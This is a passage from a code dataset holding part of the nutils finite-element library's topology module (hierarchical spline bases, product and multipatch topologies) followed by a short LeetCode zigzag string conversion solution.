https://pdfs.semanticscholar.org/a858/aa68da617ad9d41de021f6807cc422002258.pdf\n\n Args\n ----\n name : :class:`str`\n Type of basis function as provided by the base topology, with prefix\n ``h-`` (``h-std``, ``h-spline``) for a classical hierarchical basis and\n prefix ``th-`` (``th-std``, ``th-spline``) for a truncated hierarchical\n basis.\n truncation_tolerance : :class:`float` (default 1e-15)\n In order to benefit from the extra sparsity resulting from truncation,\n vanishing polynomials need to be actively identified and removed from the\n basis. 
The ``truncation_tolerance`` offers control over this threshold.\n\n Returns\n -------\n basis : :class:`nutils.function.Array`\n '''\n\n if name.startswith('h-'):\n truncated = False\n name = name[2:]\n elif name.startswith('th-'):\n truncated = True\n name = name[3:]\n else:\n return super().basis(name, *args, **kwargs)\n\n # 1. identify active (supported) and passive (unsupported) basis functions\n ubases = []\n ubasis_active = []\n ubasis_passive = []\n prev_transforms = None\n prev_ielems = []\n map_indices = []\n with log.iter.fraction('level', self.levels[::-1], self._indices_per_level[::-1]) as items:\n for topo, touchielems_i in items:\n\n topo_index_with_tail = topo.transforms.index_with_tail\n mapped_prev_ielems = [topo_index_with_tail(prev_transforms[j])[0] for j in prev_ielems]\n map_indices.insert(0, dict(zip(prev_ielems, mapped_prev_ielems)))\n nontouchielems_i = numpy.unique(numpy.array(mapped_prev_ielems, dtype=int))\n prev_ielems = ielems_i = numpy.unique(numpy.concatenate([numpy.asarray(touchielems_i, dtype=int), nontouchielems_i], axis=0))\n prev_transforms = topo.transforms\n\n basis_i = topo.basis(name, *args, **kwargs)\n assert isinstance(basis_i, function.Basis)\n ubases.insert(0, basis_i)\n # Basis functions that have at least one touchelem in their support.\n touchdofs_i = basis_i.get_dofs(touchielems_i)\n # Basis functions with (partial) support in this hierarchical topology.\n partsuppdofs_i = numpy.union1d(touchdofs_i, basis_i.get_dofs(numpy.setdiff1d(ielems_i, touchielems_i, assume_unique=True)))\n # Mask of basis functions in `partsuppdofs_i` with strict support in this hierarchical topology.\n partsuppdofs_supported_i = numpy.array([numeric.sorted_contains(ielems_i, basis_i.get_support(dof)).all() for dof in partsuppdofs_i], dtype=bool)\n ubasis_active.insert(0, numpy.intersect1d(touchdofs_i, partsuppdofs_i[partsuppdofs_supported_i], assume_unique=True))\n ubasis_passive.insert(0, partsuppdofs_i[~partsuppdofs_supported_i])\n\n *offsets, ndofs = numpy.cumsum([0, *map(len, ubasis_active)])\n\n # 2. 
construct hierarchical polynomials\n hbasis_dofs = []\n hbasis_coeffs = []\n projectcache = {}\n\n for ilevel, (level, indices) in enumerate(zip(self.levels, self._indices_per_level)):\n for ilocal in indices:\n\n hbasis_trans = transform.canonical(level.transforms[ilocal])\n tail = hbasis_trans[len(hbasis_trans)-ilevel:]\n trans_dofs = []\n trans_coeffs = []\n\n local_indices = [ilocal]\n for m in reversed(map_indices[:ilevel]):\n ilocal = m[ilocal]\n local_indices.insert(0, ilocal)\n\n if not truncated: # classical hierarchical basis\n\n for h, ilocal in enumerate(local_indices): # loop from coarse to fine\n mydofs = ubases[h].get_dofs(ilocal)\n\n imyactive = numeric.sorted_index(ubasis_active[h], mydofs, missing=-1)\n myactive = numpy.greater_equal(imyactive, 0)\n if myactive.any():\n trans_dofs.append(offsets[h]+imyactive[myactive])\n mypoly = ubases[h].get_coefficients(ilocal)\n trans_coeffs.append(mypoly[myactive])\n\n if h < len(tail):\n trans_coeffs = [tail[h].transform_poly(c) for c in trans_coeffs]\n\n else: # truncated hierarchical basis\n\n for h, ilocal in reversed(tuple(enumerate(local_indices))): # loop from fine to coarse\n mydofs = ubases[h].get_dofs(ilocal)\n mypoly = ubases[h].get_coefficients(ilocal)\n\n truncpoly = mypoly if h == len(tail) \\\n else numpy.tensordot(numpy.tensordot(tail[h].transform_poly(mypoly), project[...,mypassive], self.ndims), truncpoly[mypassive], 1)\n\n imyactive = numeric.sorted_index(ubasis_active[h], mydofs, missing=-1)\n myactive = numpy.greater_equal(imyactive, 0) & numpy.greater(abs(truncpoly), truncation_tolerance).any(axis=tuple(range(1,truncpoly.ndim)))\n if myactive.any():\n trans_dofs.append(offsets[h]+imyactive[myactive])\n trans_coeffs.append(truncpoly[myactive])\n\n mypassive = numeric.sorted_contains(ubasis_passive[h], mydofs)\n if not mypassive.any():\n break\n\n try: # construct least-squares projection matrix\n project = projectcache[mypoly]\n except KeyError:\n P = mypoly.reshape(len(mypoly), -1)\n U, S, V = numpy.linalg.svd(P) # (U * S).dot(V[:len(S)]) == P\n project = (V.T[:,:len(S)] / S).dot(U.T).reshape(mypoly.shape[1:]+mypoly.shape[:1])\n projectcache[mypoly] = project\n\n # add the dofs and coefficients to the hierarchical basis\n hbasis_dofs.append(numpy.concatenate(trans_dofs))\n hbasis_coeffs.append(numeric.poly_concatenate(tuple(trans_coeffs)))\n\n return function.PlainBasis(hbasis_coeffs, hbasis_dofs, ndofs, self.f_index, self.f_coords)\n\nclass ProductTopology(Topology):\n 'product topology'\n\n __slots__ = 'topo1', 'topo2'\n __cache__ = 'boundary', 'interfaces'\n\n @types.apply_annotations\n def __init__(self, topo1:stricttopology, topo2:stricttopology):\n assert not isinstance(topo1, ProductTopology)\n self.topo1 = topo1\n self.topo2 = topo2\n references = self.topo1.references * self.topo2.references\n transforms = transformseq.ProductTransforms(self.topo1.transforms, self.topo2.transforms)\n if (self.topo1.opposites != self.topo1.transforms) != (self.topo2.opposites != self.topo2.transforms):\n opposites = transformseq.ProductTransforms(self.topo1.opposites, self.topo2.opposites)\n else:\n opposites = transforms\n super().__init__(references, transforms, opposites)\n\n def __mul__(self, other):\n return ProductTopology(self.topo1, self.topo2 * other)\n\n @property\n def refined(self):\n return self.topo1.refined * self.topo2.refined\n\n def refine(self, n):\n if numpy.iterable(n):\n assert len(n) == self.ndims\n else:\n n = (n,)*self.ndims\n return self.topo1.refine(n[:self.topo1.ndims]) * 
self.topo2.refine(n[self.topo1.ndims:])\n\n def getitem(self, item):\n return self.topo1.getitem(item) * self.topo2 | self.topo1 * self.topo2.getitem(item) if isinstance(item, str) \\\n else self.topo1[item[:self.topo1.ndims]] * self.topo2[item[self.topo1.ndims:]]\n\n def basis(self, name, *args, **kwargs):\n def _split(arg):\n if not numpy.iterable(arg):\n return arg, arg\n assert len(arg) == self.ndims\n return tuple(a[0] if all(ai == a[0] for ai in a[1:]) else a for a in (arg[:self.topo1.ndims], arg[self.topo1.ndims:]))\n splitargs = [_split(arg) for arg in args]\n splitkwargs = [(name,)+_split(arg) for name, arg in kwargs.items()]\n basis1, basis2 = function.bifurcate(\n self.topo1.basis(name, *[arg1 for arg1, arg2 in splitargs], **{name: arg1 for name, arg1, arg2 in splitkwargs}),\n self.topo2.basis(name, *[arg2 for arg1, arg2 in splitargs], **{name: arg2 for name, arg1, arg2 in splitkwargs}))\n return function.ravel(function.outer(basis1,basis2), axis=0)\n\n @property\n def boundary(self):\n return self.topo1 * self.topo2.boundary + self.topo1.boundary * self.topo2\n\n @property\n def interfaces(self):\n return self.topo1 * self.topo2.interfaces + self.topo1.interfaces * self.topo2\n\nclass RevolutionTopology(Topology):\n 'topology consisting of a single revolution element'\n\n __slots__ = 'boundary', '_root'\n\n connectivity = numpy.empty([1,0], dtype=int)\n\n def __init__(self):\n self._root = transform.Identifier(1, 'angle')\n self.boundary = EmptyTopology(ndims=0)\n transforms = transformseq.PlainTransforms([(self._root,)], 1)\n references = References.uniform(element.RevolutionReference(), 1)\n super().__init__(references, transforms, transforms)\n\n @property\n def refined(self):\n return self\n\n def basis(self, name, *args, **kwargs):\n return function.asarray([1.])\n\nclass PatchBoundary(types.Singleton):\n\n __slots__ = 'id', 'dim', 'side', 'reverse', 'transpose'\n\n @types.apply_annotations\n def __init__(self, id:types.tuple[types.strictint], dim, side, reverse:types.tuple[bool], transpose:types.tuple[types.strictint]):\n super().__init__()\n self.id = id\n self.dim = dim\n self.side = side\n self.reverse = reverse\n self.transpose = transpose\n\n def apply_transform(self, array):\n return array[tuple(slice(None, None, -1) if i else slice(None) for i in self.reverse)].transpose(self.transpose)\n\nclass Patch(types.Singleton):\n\n __slots__ = 'topo', 'verts', 'boundaries'\n\n @types.apply_annotations\n def __init__(self, topo:stricttopology, verts:types.frozenarray, boundaries:types.tuple[types.strict[PatchBoundary]]):\n super().__init__()\n self.topo = topo\n self.verts = verts\n self.boundaries = boundaries\n\nclass MultipatchTopology(Topology):\n 'multipatch topology'\n\n __slots__ = 'patches',\n __cache__ = '_patchinterfaces', 'boundary', 'interfaces', 'refined', 'connectivity'\n\n @staticmethod\n def build_boundarydata(connectivity):\n 'build boundary data based on connectivity'\n\n boundarydata = []\n for patch in connectivity:\n ndims = len(patch.shape)\n patchboundarydata = []\n for dim, side in itertools.product(range(ndims), [-1, 0]):\n # ignore vertices at opposite face\n verts = numpy.array(patch)\n opposite = tuple({0:-1, -1:0}[side] if i == dim else slice(None) for i in range(ndims))\n verts[opposite] = verts.max()+1\n if len(set(verts.flat)) != 2**(ndims-1)+1:\n raise NotImplementedError('Cannot compute canonical boundary if vertices are used more than once.')\n # reverse axes such that lowest vertex index is at first position\n reverse = tuple(map(bool, 
numpy.unravel_index(verts.argmin(), verts.shape)))\n verts = verts[tuple(slice(None, None, -1) if i else slice(None) for i in reverse)]\n # transpose such that second lowest vertex connects to lowest vertex in first dimension, third in second dimension, et cetera\n k = [verts[tuple(1 if i == j else 0 for j in range(ndims))] for i in range(ndims)]\n transpose = tuple(sorted(range(ndims), key=k.__getitem__))\n verts = verts.transpose(transpose)\n # boundary id\n boundaryid = tuple(verts[...,0].flat)\n patchboundarydata.append(PatchBoundary(boundaryid,dim,side,reverse,transpose))\n boundarydata.append(tuple(patchboundarydata))\n\n return boundarydata\n\n @types.apply_annotations\n def __init__(self, patches:types.tuple[types.strict[Patch]]):\n 'constructor'\n\n self.patches = patches\n\n for boundaryid, patchdata in self._patchinterfaces.items():\n if len(patchdata) == 1:\n continue\n transposes = set()\n reverses = set()\n for topo, boundary in patchdata:\n assert boundary.transpose[-1] == boundary.dim\n transposes.add(tuple(i-1 if i > boundary.dim else i for i in boundary.transpose[:-1]))\n reverses.add(boundary.reverse[:boundary.dim]+boundary.reverse[boundary.dim+1:])\n if len(transposes) != 1 or len(reverses) != 1:\n raise NotImplementedError('patch interfaces must have the same order of axes and the same orientation per axis')\n\n super().__init__(\n util.sum(patch.topo.references for patch in self.patches),\n transformseq.chain([patch.topo.transforms for patch in self.patches], self.patches[0].topo.ndims),\n transformseq.chain([patch.topo.opposites for patch in self.patches], self.patches[0].topo.ndims))\n\n @property\n def _patchinterfaces(self):\n patchinterfaces = {}\n for patch in self.patches:\n for boundary in patch.boundaries:\n patchinterfaces.setdefault(boundary.id, []).append((patch.topo, boundary))\n return {\n boundaryid: tuple(data)\n for boundaryid, data in patchinterfaces.items()\n if len(data) > 1\n }\n\n def getitem(self, key):\n for i in range(len(self.patches)):\n if key == 'patch{}'.format(i):\n return self.patches[i].topo\n else:\n return DisjointUnionTopology(patch.topo.getitem(key) for patch in self.patches)\n\n def basis_spline(self, degree, patchcontinuous=True, knotvalues=None, knotmultiplicities=None, *, continuity=-1):\n '''spline from vertices\n\n Create a spline basis with degree ``degree`` per patch. 
If\n ``patchcontinuous`` is true the basis is $C^0$-continuous at patch\n interfaces.\n '''\n\n if knotvalues is None:\n knotvalues = {None: None}\n else:\n knotvalues, _knotvalues = {}, knotvalues\n for edge, k in _knotvalues.items():\n if k is None:\n rk = None\n else:\n k = tuple(k)\n rk = k[::-1]\n if edge is None:\n knotvalues[edge] = k\n else:\n l, r = edge\n assert (l,r) not in knotvalues\n assert (r,l) not in knotvalues\n knotvalues[(l,r)] = k\n knotvalues[(r,l)] = rk\n\n if knotmultiplicities is None:\n knotmultiplicities = {None: None}\n else:\n knotmultiplicities, _knotmultiplicities = {}, knotmultiplicities\n for edge, k in _knotmultiplicities.items():\n if k is None:\n rk = None\n else:\n k = tuple(k)\n rk = k[::-1]\n if edge is None:\n knotmultiplicities[edge] = k\n else:\n l, r = edge\n assert (l,r) not in knotmultiplicities\n assert (r,l) not in knotmultiplicities\n knotmultiplicities[(l,r)] = k\n knotmultiplicities[(r,l)] = rk\n\n missing = object()\n\n coeffs = []\n dofmap = []\n dofcount = 0\n commonboundarydofs = {}\n for ipatch, patch in enumerate(self.patches):\n # build structured spline basis on patch `patch.topo`\n patchknotvalues = []\n patchknotmultiplicities = []\n for idim in range(self.ndims):\n left = tuple(0 if j == idim else slice(None) for j in range(self.ndims))\n right = tuple(1 if j == idim else slice(None) for j in range(self.ndims))\n dimknotvalues = set()\n dimknotmultiplicities = set()\n for edge in zip(patch.verts[left].flat, patch.verts[right].flat):\n v = knotvalues.get(edge, knotvalues.get(None, missing))\n m = knotmultiplicities.get(edge, knotmultiplicities.get(None, missing))\n if v is missing:\n raise ValueError('missing edge')\n dimknotvalues.add(v)\n if m is missing:\n raise ValueError('missing edge')\n dimknotmultiplicities.add(m)\n if len(dimknotvalues) != 1:\n raise ValueError('ambiguous knot values for patch {}, dimension {}'.format(ipatch, idim))\n if len(dimknotmultiplicities) != 1:\n raise ValueError('ambiguous knot multiplicities for patch {}, dimension {}'.format(ipatch, idim))\n patchknotvalues.extend(dimknotvalues)\n patchknotmultiplicities.extend(dimknotmultiplicities)\n patchcoeffs, patchdofmap, patchdofcount = patch.topo._basis_spline(degree, knotvalues=patchknotvalues, knotmultiplicities=patchknotmultiplicities, continuity=continuity)\n coeffs.extend(patchcoeffs)\n dofmap.extend(types.frozenarray(dofs+dofcount, copy=False) for dofs in patchdofmap)\n if patchcontinuous:\n # reconstruct multidimensional dof structure\n dofs = dofcount + numpy.arange(numpy.prod(patchdofcount), dtype=int).reshape(patchdofcount)\n for boundary in patch.boundaries:\n # get patch boundary dofs and reorder to canonical form\n boundarydofs = boundary.apply_transform(dofs)[...,0].ravel()\n # append boundary dofs to list (in increasing order, automatic by outer loop and dof increment)\n commonboundarydofs.setdefault(boundary.id, []).append(boundarydofs)\n dofcount += numpy.prod(patchdofcount)\n\n if patchcontinuous:\n # build merge mapping: merge common boundary dofs (from low to high)\n pairs = itertools.chain(*(zip(*dofs) for dofs in commonboundarydofs.values() if len(dofs) > 1))\n merge = numpy.arange(dofcount)\n for dofs in sorted(pairs):\n merge[list(dofs)] = merge[list(dofs)].min()\n assert all(numpy.all(merge[a] == merge[b]) for a, *B in commonboundarydofs.values() for b in B), 'something went wrong while merging interface dofs; this should not have happened'\n # build renumber mapping: renumber remaining dofs consecutively, starting at 0\n remainder, renumber = numpy.unique(merge, 
return_inverse=True)\n # apply mappings\n dofmap = tuple(types.frozenarray(renumber[v], copy=False) for v in dofmap)\n dofcount = len(remainder)\n\n return function.PlainBasis(coeffs, dofmap, dofcount, self.f_index, self.f_coords)\n\n def basis_patch(self):\n 'degree zero patchwise discontinuous basis'\n\n transforms = transformseq.PlainTransforms(tuple((patch.topo.root,) for patch in self.patches), self.ndims)\n index = function.transforms_index(transforms)\n coords = function.transforms_coords(transforms, self.ndims)\n return function.DiscontBasis([types.frozenarray(1, dtype=int).reshape(1, *(1,)*self.ndims)]*len(self.patches), index, coords)\n\n @property\n def boundary(self):\n 'boundary'\n\n subtopos = []\n subnames = []\n for i, patch in enumerate(self.patches):\n for boundary in patch.boundaries:\n if boundary.id in self._patchinterfaces:\n continue\n name = patch.topo._bnames[boundary.dim][boundary.side]\n subtopos.append(patch.topo.boundary[name])\n subnames.append('patch{}-{}'.format(i, name))\n if len(subtopos) == 0:\n return EmptyTopology(self.ndims-1)\n else:\n return DisjointUnionTopology(subtopos, subnames)\n\n @property\n def interfaces(self):\n '''interfaces\n\n Return a topology with all element interfaces. The patch interfaces are\n accessible via the group ``'interpatch'`` and the interfaces *inside* a\n patch via ``'intrapatch'``.\n '''\n\n intrapatchtopo = EmptyTopology(self.ndims-1) if not self.patches else \\\n DisjointUnionTopology(patch.topo.interfaces for patch in self.patches)\n\n btopos = []\n bconnectivity = []\n for boundaryid, patchdata in self._patchinterfaces.items():\n if len(patchdata) > 2:\n raise ValueError('Cannot create interfaces of multipatch topologies with more than two interface connections.')\n pairs = []\n references = None\n for topo, boundary in patchdata:\n btopo = topo.boundary[topo._bnames[boundary.dim][boundary.side]]\n if references is None:\n references = numeric.asobjvector(btopo.references).reshape(btopo.shape)\n references = references[tuple(_ if i == boundary.dim else slice(None) for i in range(self.ndims))]\n references = boundary.apply_transform(references)[..., 0]\n references = tuple(references.flat)\n transforms = numeric.asobjvector(btopo.transforms).reshape(btopo.shape)\n transforms = transforms[tuple(_ if i == boundary.dim else slice(None) for i in range(self.ndims))]\n transforms = boundary.apply_transform(transforms)[..., 0]\n pairs.append(tuple(transforms.flat))\n # create structured topology of joined element pairs\n references = References.from_iter(references, self.ndims-1)\n transforms, opposites = pairs\n transforms = transformseq.PlainTransforms(transforms, self.ndims-1)\n opposites = transformseq.PlainTransforms(opposites, self.ndims-1)\n btopos.append(Topology(references, transforms, opposites))\n bconnectivity.append(numpy.array(boundaryid).reshape((2,)*(self.ndims-1)))\n # create multipatch topology of interpatch boundaries\n interpatchtopo = MultipatchTopology(tuple(map(Patch, btopos, bconnectivity, self.build_boundarydata(bconnectivity))))\n\n return DisjointUnionTopology((intrapatchtopo, interpatchtopo), ('intrapatch', 'interpatch'))\n\n @property\n def connectivity(self):\n connectivity = []\n patchinterfaces = {}\n for patch in self.patches: # len(connectivity) represents the element offset for the current patch\n ielems = numpy.arange(len(patch.topo)).reshape(patch.topo.shape) + len(connectivity)\n for boundary in patch.boundaries:\n patchinterfaces.setdefault(boundary.id, 
[]).append((boundary.apply_transform(ielems)[...,0], boundary.dim * 2 + (boundary.side == 0)))\n connectivity.extend(patch.topo.connectivity + len(connectivity) * numpy.not_equal(patch.topo.connectivity, -1))\n connectivity = numpy.array(connectivity)\n for patchdata in patchinterfaces.values():\n if len(patchdata) > 2:\n raise ValueError('Cannot create connectivity of multipatch topologies with more than two interface connections.')\n if len(patchdata) == 2:\n (ielem, iedge), (jelem, jedge) = patchdata\n assert ielem.shape == jelem.shape\n assert numpy.equal(connectivity[ielem, iedge], -1).all()\n assert numpy.equal(connectivity[jelem, jedge], -1).all()\n connectivity[ielem, iedge] = jelem\n connectivity[jelem, jedge] = ielem\n return types.frozenarray(connectivity, copy=False)\n\n @property\n def refined(self):\n 'refine'\n\n return MultipatchTopology(Patch(patch.topo.refined, patch.verts, patch.boundaries) for patch in self.patches)\n\n# vim:sw=2:sts=2:et\n","sub_path":"nutils/topology.py","file_name":"topology.py","file_ext":"py","file_size_in_byte":97152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"246233461","text":"def convert(s, numRows):\n answer = ''\n if numRows == 1:\n return s\n num = 2 * (numRows - 1) # number of characters in one full zigzag cycle\n n = len(s) // num # number of complete cycles\n x = len(s) % num # leftover characters in the final partial cycle\n # first row\n for a in range(n):\n answer += s[a * num]\n if x > 0: # handle the partial cycle\n answer += s[n * num]\n # middle rows: row b receives two characters per complete cycle\n for b in range(1, numRows - 1):\n for a in range(n):\n answer += s[a * num + b]\n answer += s[(a + 1) * num - b]\n # handle the partial cycle\n if x >= b + 1:\n answer += s[n * num + b]\n if x >= num - b + 1:\n answer += s[(n + 1) * num - b]\n # last row\n for a in range(n):\n answer += s[numRows - 1 + a * num]\n if x >= numRows: # handle the partial cycle\n answer += s[numRows - 1 + n * num]\n return answer\n\n\ns = 'AB'\nrows = 3\nprint(convert(s, rows))\n\n","sub_path":"LeetCode/0006/first.py","file_name":"first.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
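The cycle arithmetic in LeetCode/0006/first.py above is easy to get wrong at the partial final cycle, so an independent cross-check is useful. The sketch below is hypothetical and not part of the dataset: `convert_by_rows` is an assumed name for a row-walking reimplementation, and it presumes `convert` from the record above has been extracted into the same module.

# Hypothetical cross-check, not part of the original record: walk the string
# once, bouncing a row index between 0 and numRows-1, then join the rows.
def convert_by_rows(s, numRows):
    if numRows == 1 or numRows >= len(s):
        return s
    rows = [''] * numRows
    row, step = 0, 1
    for ch in s:
        rows[row] += ch
        if row == 0:
            step = 1
        elif row == numRows - 1:
            step = -1
        row += step
    return ''.join(rows)

# Assumes `convert` (from the record above) is defined in this module.
for text, r in [('PAYPALISHIRING', 3), ('PAYPALISHIRING', 4), ('AB', 3)]:
    assert convert(text, r) == convert_by_rows(text, r)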
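For the nutils/topology.py record earlier in this dump, the HierarchicalTopology.basis docstring describes the ``h-`` and ``th-`` prefixed basis names. A minimal usage sketch under stated assumptions, not a definitive recipe: it assumes a nutils installation, and `mesh.rectilinear` comes from the public nutils.mesh API rather than from this file; the mesh size and refinement indices are arbitrary illustrations.

# Minimal sketch, assuming nutils is installed and importable.
from nutils import mesh

topo, geom = mesh.rectilinear([4, 4])       # structured 4x4 base topology
htopo = topo.refined_by([0, 1, 5])          # locally refine a few elements
basis = htopo.basis('th-spline', degree=2)  # truncated hierarchical spline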